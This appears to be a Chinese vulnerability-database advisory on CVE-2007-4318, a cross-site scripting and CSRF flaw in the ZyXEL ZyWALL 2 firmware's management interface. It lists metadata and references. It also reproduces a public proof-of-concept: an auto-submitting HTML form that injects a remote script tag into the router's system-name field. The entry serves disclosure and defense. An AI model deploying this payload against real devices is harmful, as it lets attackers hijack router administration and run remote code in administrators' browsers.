ZyXEL ZyWALL 2 ZyNOS firmware管理界面跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113447 漏洞类型 跨站脚本
发布时间 2007-08-10 更新时间 2007-08-13
CVE编号 CVE-2007-4318 CNNVD-ID CNNVD-200708-182
漏洞平台 Hardware CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/30485
https://www.securityfocus.com/bid/81603
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-182
|漏洞详情
ZyxelZywall2设备上的ZyNOSfirmware3.62(WK.6)的管理界面的Forms/General_1中存在跨站脚本攻击漏洞。远程验证管理员可以借助sysSystemName参数,注入任意web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/25262/info

ZyXEL ZyWALL 2 is prone to multiple remote vulnerabilities that affect the management interface.

An attacker can exploit these issues to carry out cross-site request forgery, HTML-injection, and denial-of-service attacks.

ZyWALL 2 running with firmware V3.62(WK.6) is reported vulnerable to this issue. 

 <html>
  <body onload="document.CSRF.submit()">
  <FORM name="CSRF" METHOD="POST"
ACTION="http://192.168.1.1/Forms/General_1">
  <INPUT NAME="sysSystemName" VALUE="<script src='http://nx.fi/X'>"
  <INPUT NAME="sysDomainName" VALUE="evil.com">
  <INPUT NAME="StdioTimout" VALUE="0">
  <INPUT NAME="sysSubmit" VALUE="Apply">
  </form>
  </body>
  </html>
|受影响的产品
ZyXEL Zywall 2 0 ZyXEL Zynos 3.62
|参考资料

来源:XF
名称:zywall-management-csrf(35913)
链接:http://xforce.iss.net/xforce/xfdb/35913
来源:BID
名称:25262
链接:http://www.securityfocus.com/bid/25262
来源:BUGTRAQ
名称:20070810ZyxelZywall2multiplevulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/476031/100/0/threaded
来源:MISC
链接:http://www.louhi.fi/advisory/zyxel_070810.txt
来源:OSVDB
名称:38721
链接:http://osvdb.org/38721
来源:SREASON
名称:3002
链接:http://securityreason.com/securityalert/3002
来源:SECUNIA
名称:26381
链接:http://secunia.com/advisories/26381